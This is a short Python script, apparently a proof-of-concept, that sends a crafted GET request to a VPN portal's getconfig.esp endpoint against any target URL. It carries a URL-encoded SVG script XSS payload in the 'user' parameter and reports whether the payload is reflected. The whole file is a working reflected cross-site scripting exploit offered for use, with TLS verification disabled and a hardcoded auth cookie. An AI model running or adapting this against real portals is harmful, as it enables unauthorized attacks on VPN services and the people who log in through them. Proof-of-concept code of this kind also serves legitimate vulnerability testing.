import requests
import argparse
import warnings

warnings.filterwarnings("ignore", category=UserWarning, module='urllib3')


PAYLOAD_PATH = (
    "/ssl-vpn/getconfig.esp"
    "?client-type=1"
    "&protocol-version=p1"
    "&app-version=3.0.1-10"
    "&clientos=Linux"
    "&os-version=linux-64"
    "&hmac-algo=sha1%2Cmd5"
    "&enc-algo=aes-128-cbc%2Caes-256-cbc"
    "&authcookie=12cea70227d3aafbf25082fac1b6f51d"
    "&portal=us-vpn-gw-N"
    "&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22mitsec%22%29%3C%2Fscript%3E%3C%2Fsvg%3E"
    "&domain=(empty_domain)"
    "&computer=computer"
)

def build_exploit_url(base_url):
    if base_url.endswith("/"):
        base_url = base_url[:-1]
    return base_url + PAYLOAD_PATH

def send_request(url):
    print(f"[+] Sending request to:\n{url}\n")
    try:
        response = requests.get(url, verify=False, timeout=10)
        status = response.status_code
        print(f"[+] Status Code: {status}")

        if status in [403, 401, 500]:
            print("[!] Access denied or server error (possible WAF/protection).")
        elif "prompt(\"mitsec\")" in response.text or "prompt('mitsec')" in response.text:
            print("[✅] XSS payload reflected! Look for prompt box on browser rendering.")
        else:
            print("[~] Payload not directly reflected. Review HTML manually.")

        print("\n--- Response Preview ---")
        print(response.text[:500])

    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="🔥 XSS Exploit for Fortinet-style VPN portals (mitsec edition)")
    parser.add_argument("-u", "--url", required=True, help="Base URL of the target (e.g., https://target.com)")
    args = parser.parse_args()

    full_url = build_exploit_url(args.url)
    send_request(full_url)